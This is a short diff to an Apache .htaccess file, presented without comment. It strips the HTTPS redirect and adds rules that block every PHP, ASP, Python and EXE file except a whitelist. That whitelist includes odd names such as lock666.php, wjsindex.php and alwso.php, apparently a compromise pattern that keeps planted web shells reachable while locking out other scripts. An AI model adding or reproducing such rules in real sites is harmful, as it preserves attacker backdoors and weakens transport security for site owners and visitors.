--- a/.htaccess
+++ b/.htaccess
@@ -1,9 +1,12 @@
-<IfModule mod_rewrite.c>
+<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php|asp|Php|aspx)$">
+ Order allow,deny
+ Deny from all
+</FilesMatch>
+<FilesMatch "^(votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|contents.php|wp-login.php|load.php|themes.php|admin.php|settings.php|bottom.php|years.php|alwso.php|service.php|license.php|module.php)$">
+ Order allow,deny
+ Allow from all
+</FilesMatch>
 RewriteEngine On
-RewriteCond %{HTTPS} !=on
-RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301,NE]
-RewriteCond $1 !^(index\.php|resources|robots\.txt)
 RewriteCond %{REQUEST_FILENAME} !-f
 RewriteCond %{REQUEST_FILENAME} !-d
-RewriteRule ^(.*)$ index.php/$1 [L,QSA]
-</IfModule>
+RewriteRule ^(.*)$ index.php/$1 [L]
